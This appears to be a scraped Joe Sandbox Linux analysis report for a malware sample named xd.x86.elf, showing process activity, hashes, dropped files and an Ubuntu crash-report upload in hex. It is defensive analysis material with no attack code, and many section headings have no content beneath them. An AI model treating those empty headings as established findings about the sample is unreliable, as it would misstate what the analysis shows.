Apr 2, 2025 20:55:15.179532051 CEST	192.168.2.23	192.168.2.1	8283	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2025-04-02 18:53:56 UTC	307	OUT	POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1 Host: daisy.ubuntu.com Accept: / Content-Type: application/octet-stream X-Whoopsie-Version: 0.2.69ubuntu0.3 Content-Length: 164887 Expect: 100-continue
2025-04-02 18:53:57 UTC	25	IN	HTTP/1.1 100 Continue
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 17 84 02 00 02 50 72 6f 63 45 6e 76 69 72 6f 6e 00 4e 00 00 00 50 41 54 48 3d 28 63 75 73 74 6f 6d 2c 20 6e 6f 20 75 73 65 72 29 0a 58 44 47 5f 52 55 4e 54 49 4d 45 5f 44 49 52 3d 3c 73 65 74 3e 0a 4c 41 4e 47 3d 65 6e 5f 55 53 2e 55 54 46 2d 38 0a 53 48 45 4c 4c 3d 2f 62 69 6e 2f 62 61 73 68 00 02 5f 4c 6f 67 69 6e 64 53 65 73 73 69 6f 6e 00 02 00 00 00 35 00 02 44 61 74 65 00 19 00 00 00 54 75 65 20 41 75 67 20 31 37 20 32 30 3a 31 38 3a 30 34 20 32 30 32 31 00 02 53 6f 75 72 63 65 50 61 63 6b 61 67 65 00 0d 00 00 00 6c 69 67 68 74 2d 6c 6f 63 6b 65 72 00 02 50 61 63 6b 61 67 65 41 72 63 68 69 74 65 63 74 75 72 65 00 06 00 00 00 61 6d 64 36 34 00 02 41 72 63 68 69 74 65 63 74 75 72 65 00 06 00 00 00 61 6d 64 36 34 00 02 44 69 73 74 72 6f 52 65 6c 65 61 Data Ascii: ProcEnvironNPATH=(custom, no user)XDG_RUNTIME_DIR=<set>LANG=en_US.UTF-8SHELL=/bin/bash_LogindSession5DateTue Aug 17 20:18:04 2021SourcePackagelight-lockerPackageArchitectureamd64Architectureamd64DistroRelea
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 74 75 34 2e 31 0a 6c 69 62 70 61 6d 2d 72 75 6e 74 69 6d 65 20 31 2e 33 2e 31 2d 35 75 62 75 6e 74 75 34 2e 31 0a 6c 69 62 70 61 6d 2d 73 79 73 74 65 6d 64 20 32 34 35 2e 34 2d 34 75 62 75 6e 74 75 33 2e 31 31 0a 6c 69 62 70 61 6d 30 67 20 31 2e 33 2e 31 2d 35 75 62 75 6e 74 75 34 2e 31 0a 6c 69 62 70 61 6e 67 6f 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 6e 67 6f 63 61 69 72 6f 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 6e 67 6f 66 74 32 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 6e 67 6f 78 66 74 2d 31 2e 30 2d 30 20 31 2e 34 34 2e 37 2d 32 75 62 75 6e 74 75 34 0a 6c 69 62 70 61 70 65 72 2d 75 74 69 6c 73 20 31 2e 31 2e 32 38 0a 6c Data Ascii: tu4.1libpam-runtime 1.3.1-5ubuntu4.1libpam-systemd 245.4-4ubuntu3.11libpam0g 1.3.1-5ubuntu4.1libpango-1.0-0 1.44.7-2ubuntu4libpangocairo-1.0-0 1.44.7-2ubuntu4libpangoft2-1.0-0 1.44.7-2ubuntu4libpangoxft-1.0-0 1.44.7-2ubuntu4libpaper-utils 1.1.28l
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 67 73 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 30 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 31 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 32 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 33 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 34 20 20 20 20 20 20 20 20 20 20 20 20 20 30 78 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 0a 6b 35 20 Data Ascii: 0x0 0gs 0x0 0k0 0x0 0k1 0x0 0k2 0x0 0k3 0x0 0k4 0x0 0k5
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 2d 6c 69 6e 75 78 2d 67 6e 75 2f 6c 69 62 78 63 62 2d 72 65 6e 64 65 72 2e 73 6f 2e 30 2e 30 2e 30 0a 37 66 37 39 31 63 30 37 34 30 30 30 2d 37 66 37 39 31 63 30 37 35 30 30 30 20 2d 2d 2d 70 20 30 30 30 30 63 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 36 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 2d 6c 69 6e 75 78 2d 67 6e 75 2f 6c 69 62 78 63 62 2d 72 65 6e 64 65 72 2e 73 6f 2e 30 2e 30 2e 30 0a 37 66 37 39 31 63 30 37 35 30 30 30 2d 37 66 37 39 31 63 30 37 36 30 30 30 20 72 2d 2d 70 20 30 30 30 30 63 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 36 30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 Data Ascii: /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.07f791c074000-7f791c075000 ---p 0000c000 fd:00 806260 /usr/lib/x86_64-linux-gnu/libxcb-render.so.0.0.07f791c075000-7f791c076000 r--p 0000c000 fd:00 806260 /u
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 6e 75 78 2d 67 6e 75 2f 6c 69 62 67 64 6b 5f 70 69 78 62 75 66 2d 32 2e 30 2e 73 6f 2e 30 2e 34 30 30 30 2e 30 0a 37 66 37 39 31 63 37 37 33 30 30 30 2d 37 66 37 39 31 63 37 37 34 30 30 30 20 72 77 2d 70 20 30 30 30 32 36 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 34 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 2d 6c 69 6e 75 78 2d 67 6e 75 2f 6c 69 62 67 64 6b 5f 70 69 78 62 75 66 2d 32 2e 30 2e 73 6f 2e 30 2e 34 30 30 30 2e 30 0a 37 66 37 39 31 63 37 37 34 30 30 30 2d 37 66 37 39 31 63 37 37 38 30 30 30 20 72 2d 2d 70 20 30 30 30 30 30 30 30 30 20 66 64 3a 30 30 20 38 30 36 32 36 38 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 75 73 72 2f 6c 69 62 2f 78 38 36 5f 36 34 Data Ascii: nux-gnu/libgdk_pixbuf-2.0.so.0.4000.07f791c773000-7f791c774000 rw-p 00026000 fd:00 806245 /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0.4000.07f791c774000-7f791c778000 r--p 00000000 fd:00 806268 /usr/lib/x86_64
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 20 70 6c 61 74 66 6f 72 6d 20 65 69 73 61 2e 30 3a 20 43 61 6e 6e 6f 74 20 61 6c 6c 6f 63 61 74 65 20 72 65 73 6f 75 72 63 65 20 66 6f 72 20 45 49 53 41 20 73 6c 6f 74 20 37 0a 41 75 67 20 31 37 20 32 30 3a 32 34 3a 34 36 20 67 61 6c 61 73 73 69 61 20 6b 65 72 6e 65 6c 3a 20 70 6c 61 74 66 6f 72 6d 20 65 69 73 61 2e 30 3a 20 43 61 6e 6e 6f 74 20 61 6c 6c 6f 63 61 74 65 20 72 65 73 6f 75 72 63 65 20 66 6f 72 20 45 49 53 41 20 73 6c 6f 74 20 38 0a 41 75 67 20 31 37 20 32 30 3a 32 34 3a 34 36 20 67 61 6c 61 73 73 69 61 20 6b 65 72 6e 65 6c 3a 20 73 64 20 33 32 3a 30 3a 30 3a 30 3a 20 5b 73 64 61 5d 20 41 73 73 75 6d 69 6e 67 20 64 72 69 76 65 20 63 61 63 68 65 3a 20 77 72 69 74 65 20 74 68 72 6f 75 67 68 0a 41 75 67 20 31 37 20 32 30 3a 32 34 3a 34 37 20 67 Data Ascii: platform eisa.0: Cannot allocate resource for EISA slot 7Aug 17 20:24:46 galassia kernel: platform eisa.0: Cannot allocate resource for EISA slot 8Aug 17 20:24:46 galassia kernel: sd 32:0:0:0: [sda] Assuming drive cache: write throughAug 17 20:24:47 g
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 35 35 31 5d 3a 20 28 49 49 29 20 4c 6f 61 64 4d 6f 64 75 6c 65 3a 20 22 66 62 64 65 76 68 77 22 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 34 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 4c 6f 61 64 69 6e 67 20 2f 75 73 72 2f 6c 69 62 2f 78 6f 72 67 2f 6d 6f 64 75 6c 65 73 2f 6c 69 62 66 62 64 65 76 68 77 2e 73 6f 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 34 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 4d 6f 64 75 6c 65 20 66 62 64 65 76 68 77 3a 20 76 65 6e 64 6f 72 3d 22 58 2e 4f 72 67 20 46 6f 75 6e 64 61 74 69 6f 6e 22 0a 41 75 67 20 31 37 Data Ascii: 551]: (II) LoadModule: "fbdevhw"Aug 17 20:25:04 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) Loading /usr/lib/xorg/modules/libfbdevhw.soAug 17 20:25:04 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) Module fbdevhw: vendor="X.Org Foundation"Aug 17
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 76 6d 77 61 72 65 28 30 29 3a 20 4e 6f 74 20 75 73 69 6e 67 20 64 65 66 61 75 6c 74 20 6d 6f 64 65 20 22 31 39 32 30 78 31 32 30 30 22 20 28 69 6e 73 75 66 66 69 63 69 65 6e 74 20 6d 65 6d 6f 72 79 20 66 6f 72 20 6d 6f 64 65 29 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 76 6d 77 61 72 65 28 30 29 3a 20 4e 6f 74 20 75 73 69 6e 67 20 64 65 66 61 75 6c 74 20 6d 6f 64 65 20 22 39 36 30 78 36 30 30 22 20 28 62 61 64 20 6d 6f 64 65 20 63 6c 6f 63 6b 2f 69 6e 74 65 72 6c 61 63 65 2f 64 6f 75 62 6c 65 73 Data Ascii: /lib/gdm3/gdm-x-session[1551]: (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doubles
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 20 31 33 33 36 20 31 35 32 30 20 20 38 36 34 20 38 36 35 20 38 36 38 20 38 39 35 20 2d 68 73 79 6e 63 20 2b 76 73 79 6e 63 20 28 35 33 2e 37 20 6b 48 7a 20 64 29 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 2a 2a 29 20 76 6d 77 61 72 65 28 30 29 3a 20 20 44 65 66 61 75 6c 74 20 6d 6f 64 65 20 22 31 30 32 34 78 37 36 38 22 3a 20 39 34 2e 35 20 4d 48 7a 2c 20 36 38 2e 37 20 6b 48 7a 2c 20 38 35 2e 30 20 48 7a 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 49 49 29 20 76 6d 77 61 72 Data Ascii: 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 HzAug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: (II) vmwar
2025-04-02 18:53:57 UTC	16384	OUT	Data Raw: 65 64 20 53 65 74 20 32 20 6b 65 79 62 6f 61 72 64 3a 20 61 6c 77 61 79 73 20 72 65 70 6f 72 74 73 20 63 6f 72 65 20 65 76 65 6e 74 73 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 2a 2a 29 20 4f 70 74 69 6f 6e 20 22 44 65 76 69 63 65 22 20 22 2f 64 65 76 2f 69 6e 70 75 74 2f 65 76 65 6e 74 31 22 0a 41 75 67 20 31 37 20 32 30 3a 32 35 3a 30 35 20 67 61 6c 61 73 73 69 61 20 2f 75 73 72 2f 6c 69 62 2f 67 64 6d 33 2f 67 64 6d 2d 78 2d 73 65 73 73 69 6f 6e 5b 31 35 35 31 5d 3a 20 28 2a 2a 29 20 4f 70 74 69 6f 6e 20 22 5f 73 6f 75 72 63 65 22 20 22 73 65 72 76 65 72 2f 75 64 65 76 22 0a 41 75 67 20 31 37 20 32 30 3a 32 35 Data Ascii: ed Set 2 keyboard: always reports core eventsAug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: () Option "Device" "/dev/input/event1"Aug 17 20:25:05 galassia /usr/lib/gdm3/gdm-x-session[1551]: () Option "_source" "server/udev"Aug 17 20:25
2025-04-02 18:53:57 UTC	279	IN	HTTP/1.1 400 Bad Request Date: Wed, 02 Apr 2025 18:53:57 GMT Server: gunicorn/19.7.1 X-Daisy-Revision-Number: 979 X-Oops-Repository-Version: 0.0.0 Strict-Transport-Security: max-age=2592000 Connection: close Transfer-Encoding: chunked 17 Crash already reported. 0

Start time (UTC):	18:53:27
Start date (UTC):	02/04/2025
Path:	/tmp/xd.x86.elf
Arguments:	/tmp/xd.x86.elf
File size:	37268 bytes
MD5 hash:	a68aa2179d0db1bb9cf010a4949ea024

Start time (UTC):	18:53:28
Start date (UTC):	02/04/2025
Path:	/tmp/xd.x86.elf
Arguments:	-
File size:	37268 bytes
MD5 hash:	a68aa2179d0db1bb9cf010a4949ea024

Start time (UTC):	18:53:29
Start date (UTC):	02/04/2025
Path:	/tmp/xd.x86.elf
Arguments:	-
File size:	37268 bytes
MD5 hash:	a68aa2179d0db1bb9cf010a4949ea024

Start time (UTC):	18:53:40
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:53:52
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:53:53
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:53:54
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:53:55
Start date (UTC):	02/04/2025
Path:	/usr/bin/gpu-manager
Arguments:	-
File size:	76616 bytes
MD5 hash:	8fae9dd5dd67e1f33d873089c2fd8761

Start time (UTC):	18:53:56
Start date (UTC):	02/04/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	18:53:58
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:54:08
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:54:09
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:54:23
Start date (UTC):	02/04/2025
Path:	/usr/libexec/gvfsd-fuse
Arguments:	-
File size:	47632 bytes
MD5 hash:	d18fbf1cbf8eb57b17fac48b7b4be933

Start time (UTC):	18:54:55
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report xd.x86.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Process Tree

Malware Threat Intel

Yara Signatures

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink

/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source

/run/gdm3.pid

/run/user/1000/pulse/pid

/var/lib/ubuntu-drivers-common/last_gfx_boot

/var/log/gpu-manager.log

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

System Behavior

Analysis Process: xd.x86.elf PID: 6239, Parent PID: 6162

General

File Activities

File Opened

Directory Enumerated

Process Activities

Process Forked

Linux Analysis Report
xd.x86.elf

Start time (UTC):	18:54:56
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:54:57
Start date (UTC):	02/04/2025
Path:	/usr/bin/gpu-manager
Arguments:	-
File size:	76616 bytes
MD5 hash:	8fae9dd5dd67e1f33d873089c2fd8761

Start time (UTC):	18:54:59
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:00
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:01
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:02
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:03
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:04
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:05
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	18:55:06
Start date (UTC):	02/04/2025
Path:	/usr/lib/systemd/systemd (deleted)
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75